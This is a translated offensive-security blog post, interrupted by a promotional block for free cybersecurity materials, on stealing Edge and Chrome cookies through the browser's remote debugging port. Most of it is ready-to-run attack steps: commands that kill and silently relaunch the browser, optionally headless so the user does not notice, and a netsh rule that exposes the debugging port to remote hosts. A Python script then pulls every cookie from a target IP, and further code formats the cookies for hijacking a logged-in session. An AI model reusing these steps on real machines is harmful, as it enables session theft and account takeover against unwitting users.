foreword
This article will introduce how to obtain Chromium kernel browser cookies without relying on DPAPI
remote debugging
First, let's take edge as an example. The edge browser is based on Chromium, and Chromium can enable remote debugging. The official documentation for enabling remote debugging is as follows:
https://blog.chromium.org/2011/05/remote-debugging-with-chrome-developer.html
chrome.exe --remote-debugging-port=9222 --user-data-dir=remote-profile
So what can you do after enabling remote debugging? Continue to read the official documentation:
https://chromedevtools.github.io/devtools-protocol/tot/Storage/
The above official document is the Chrome developer tool protocol document, which mentions that if you need to implement debugging and analyze Chrome, you need to enable its remote debugging:
And after the notification is turned on, it also provides interfaces such as json and the use of various APIs:
Since edge is based on Chromium, edge should also be able to enable remote debugging. Try to use Chrome to enable remote debugging command to enable remote debugging of edge:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222
It is possible after testing, but the premise is that there must be no msedge process running, otherwise, although the above command will start the edge process, it will not open the remote debugging port. Stop command:
Get-Process msedge | Stop-Process
get cookie
First of all, check whether the Chrome developer tool protocol can obtain the browser password or something. There is no document:
help cybersecurity learn, and get a full set of information for free:
① Cybersecurity learning growth path mind map②
60+ classic cybersecurity
toolkits③ 100+ SRC analysis reports④
150+ network security offensive and defensive combat technical e-books
⑤ The most authoritative CISSP certification exam guide + question bank
⑥ More than 1800 pages of CTF practical skills manual
⑦ The latest collection of network security interview questions (including answers)
⑧ APP client security Detection Guide (Android+IOS)
Also, you usually use F12 to call up the developer tools, and there is no way to obtain the browser password.
Continue to search for cookies, you can see that there is one Network.getAllCookies, but it is mentioned in the document that it has been deprecated, and use Storage.getCookies:
Then try to use Storage.getCookieswhether you can get cookies.
After enabling remote debugging, get the websocket address:
Then when trying to use python's websocket-client module to send and receive data, I found a prompt 403:
According to the prompt, it seems to be a CORS problem, and a solution is given:
--remote-allow-origins=*
After adding, send the following packet to successfully get the cookie:
{"id": 1, "method": "Storage.getCookies"}
In order to facilitate remote access to its websocket interface, the remote debugging port can be mapped:
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222
This gives remote access to the target's remote debugging port:
Write code
Github has a warehouse that automatically opens the remote debugging port and obtains cookies:
https://github.com/defaultnamehere/cookie_crimes/blob/master/cookie_crimes.py
There are several problems in the code. First, it does not solve the CORS problem. Second, it uses a possibly deprecated version. Network.getAllCookiesThird, you can use the cmd command instead of relying on python to enable the remote debugging port. The final modified code is as follows:
import json
import requests
import websocket
GET_ALL_COOKIES_REQUEST = json.dumps({"id": 1, "method": "Storage.getCookies"})
def hit_that_secret_json_path_like_its_1997():
response = requests.get("http://10.211.55.8:48333/json")
websocket_url = response.json()[0].get("webSocketDebuggerUrl")
return websocket_url
def gimme_those_cookies(ws_url):
ws = websocket.create_connection(ws_url)
ws.send(GET_ALL_COOKIES_REQUEST)
result = ws.recv()
ws.close()
response = json.loads(result)
cookies = response["result"]["cookies"]
return cookies
ws_url = hit_that_secret_json_path_like_its_1997()
print(ws_url)
cookies = gimme_those_cookies(ws_url)
print(cookies)
In this way, the remote debugging port can be opened on the target machine and the cookie can be obtained. In order to prevent the opened browser from being discovered by the user, you can use the headless parameter -headless, but there is a shortcoming, which will be discussed later. And in order to prevent the /json interface from returning empty, it is recommended to open a website when the browser starts, so the final complete command is as follows:
# 关闭edge
Get-Process msedge | Stop-Process
# 启动远程调试
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.baidu.com --remote-debugging-port=9222 --remote-allow-origins=* -headless
# 把远程调试端口映射出来
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222
# 访问json接口获取websocket地址并获取Cookie
# 关闭端口映射
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=48333
Practical
Start edge with the above command:
Obtaining cookies, I found that only cookies of www.baidu.com can be obtained:
this is the disadvantage of using headless parameters mentioned above, -headlessand only cookies of opened websites can be obtained. Therefore, if you want to obtain the cookie of the specified target website, you must either repeat the above actions, or cancel the headless parameter -headless. The author recommends to cancel -headlessthe parameter, and the opened browser users can also use it normally, so the recommended command is as follows:
# 关闭edge
Get-Process msedge | Stop-Process
# 启动远程调试
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.baidu.com --remote-debugging-port=9222 --remote-allow-origins=*
# 把远程调试端口映射出来
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222
# 访问json接口获取websocket地址并获取Cookie
# 关闭端口映射
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=48333
After obtaining the above data, how to use it? The author provides the following code to complete the splicing that meets the Cookie format requirements:
def to_cookie_dict(data):
if 'www.chinabaiker.com' in data['domain']:
cookie_dict = {data['name']: data['value'], 'Domain': data['domain'], 'Path': data['path'], 'Expires': data['expires']}
print(cookie_dict)
return cookie_dict
data_list = [{}]
cookie_dict_list = [to_cookie_dict(data) for data in data_list]
# 遍历多个cookie字典,将每个字典中的key和value格式化为key=value的字符串
cookie_str_list = []
for cookie_dict in cookie_dict_list:
try:
for k, v in cookie_dict.items():
cookie_str_list.append('{}={}'.format(k, v))
except Exception as e:
print(e)
pass
# 使用;将多个key=value字符串连接在一起
cookie_str = ';'.join(cookie_str_list)
print(cookie_str)
Because there are many cookies obtained, a simple filter is made at the beginning of the code:
if 'www.chinabaiker.com' in data['domain']:
The final effect is as follows:
First, the website is in a non-login state:
Execute the above code to get the cookie:
then put it in burpsuite for automatic replacement. The author's replacement rules are as follows:
Finally, the replacement of the cookie is successfully completed and the login target system is completed:
The Chrome browser is the same, so I won’t spend a lot of space talking about it:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.baidu.com --remote-debugging-port=9222 --remote-allow-origins=*
Summarize
This article introduces the method of obtaining Chromium kernel browser cookies without relying on DPAPI, which can obtain browser cookies with as little interception as possible.